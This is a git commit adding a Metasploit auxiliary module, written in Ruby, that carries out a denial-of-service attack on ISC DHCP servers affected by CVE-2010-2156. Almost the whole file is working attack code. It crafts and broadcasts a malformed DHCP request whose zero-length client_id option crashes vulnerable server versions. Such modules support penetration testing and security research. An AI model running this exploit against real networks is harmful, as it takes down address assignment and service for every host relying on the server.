Added ISC DHCP Zero Length ClientID DoS Module thx TheLightCosine
git-svn-id: file:///home/svn/framework3/trunk@12293 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e9e8026832
commit
5e89b22aae
|
@ -0,0 +1,82 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'racket'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Dos
|
||||
include Msf::Exploit::Capture
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',
|
||||
'Description' => %q{
|
||||
This module performs a Denial of Service Attack against the ISC DHCP server,
|
||||
versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
|
||||
message with a 0-length client_id option for an IP address on the appropriate range
|
||||
for the dhcp server. When ISC DHCP Server tries to hash this value it exits
|
||||
abnormally.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'sid', # Original POC
|
||||
'TheLightCosine' # msf module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', 'CVE-2010-2156' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/14185/']
|
||||
]
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
|
||||
]
|
||||
)
|
||||
deregister_options('RHOST','FILTER','PCAPFILE')
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Creating DHCP Request with 0-length ClientID")
|
||||
open_pcap
|
||||
n = Racket::Racket.new
|
||||
|
||||
n.layers[3] = Racket::L3::IPv4.new
|
||||
n.layers[3].dst_ip = '255.255.255.255'
|
||||
n.layers[3].version = 4
|
||||
n.layers[3].hlen = 0x05
|
||||
n.layers[3].ttl = 44
|
||||
n.layers[3].protocol = 0x11
|
||||
|
||||
n.layers[4] = Racket::L4::UDP.new
|
||||
n.layers[4].src_port = 68
|
||||
n.layers[4].dst_port = 67
|
||||
|
||||
n.layers[5] = Racket::L5::BOOTP.new
|
||||
n.layers[5].cip = datastore['RIP']
|
||||
n.layers[5].chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"
|
||||
n.layers[5].type = 1
|
||||
n.layers[5].payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"
|
||||
|
||||
n.layers[4].payload = n.layers[5]
|
||||
n.layers[4].fix!(n.layers[3].src_ip, n.layers[3].dst_ip)
|
||||
n.layers[4].payload = ""
|
||||
|
||||
buff = n.pack
|
||||
print_status("Sending malformed DHCP request...")
|
||||
capture_sendto(buff, '255.255.255.255')
|
||||
close_pcap
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue